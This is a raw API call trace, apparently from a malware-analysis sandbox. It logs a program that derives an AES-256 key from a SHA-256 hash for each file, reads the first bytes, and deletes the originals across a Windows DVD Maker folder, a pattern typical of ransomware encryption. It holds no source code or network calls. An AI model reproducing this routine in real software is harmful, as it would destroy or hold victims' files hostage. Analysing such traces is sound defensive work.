1 [0144.291] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dd24 [0144.291] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.310] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.310] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.310] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.358] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv")) returned 0 [0144.359] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.359] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.359] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.359] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.359] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0b4a [0144.359] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.412] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.412] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.412] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.413] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv")) returned 0 [0144.414] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.415] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.415] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.415] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.415] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd43ca [0144.415] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.468] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.468] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.468] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.470] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv")) returned 0 [0144.471] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.471] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.471] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.471] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.471] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc8 [0144.471] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.474] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.474] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.475] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png")) returned 0 [0144.475] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.476] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.476] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.476] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.476] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x739 [0144.476] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.478] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.478] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.478] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.479] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png")) returned 0 [0144.480] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.480] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.480] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.480] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.480] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc8 [0144.480] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.516] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.516] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.516] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.519] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png")) returned 0 [0144.519] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.520] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.520] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.520] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.520] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7f9 [0144.520] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.522] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.522] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.522] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.523] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png")) returned 0 [0144.524] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.525] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.525] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.525] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.525] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb4b [0144.525] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.530] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.530] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.530] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.532] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png")) returned 0 [0144.542] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.542] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.542] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.542] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.543] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc8 [0144.543] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.545] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.545] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.545] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.547] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png")) returned 0 [0144.547] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.548] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.548] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.548] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.548] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7e3 [0144.548] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.550] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.550] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.550] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.551] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png")) returned 0 [0144.552] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.552] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.552] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.552] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.552] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x33b7 [0144.552] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.556] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.556] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.556] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.557] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png")) returned 0 [0144.557] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.558] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.558] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.558] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.558] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1681 [0144.558] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.593] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.593] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.593] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.594] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png")) returned 0 [0144.638] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.639] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.639] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.639] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.639] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1fe9 [0144.639] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.642] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.642] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.642] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.643] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png")) returned 0 [0144.644] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.644] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.644] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.644] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.644] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x643e [0144.644] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.648] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.648] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.648] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.649] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png")) returned 0 [0144.650] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.650] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.650] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.650] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.650] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0144.650] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.653] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.653] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.653] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.654] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png")) returned 0 [0144.655] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.655] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.655] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1f0a [0144.655] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.658] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.658] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.658] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.659] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png")) returned 0 [0144.662] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.663] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.663] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.663] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.663] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1146 [0144.663] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.666] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.666] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.666] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.667] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png")) returned 0 [0144.682] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.682] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.682] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.682] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.682] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ed0 [0144.682] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.685] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.685] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.685] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.686] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png")) returned 0 [0144.687] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.687] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.687] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.687] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.687] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41ca [0144.687] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.732] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.732] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.732] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.733] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png")) returned 0 [0144.733] 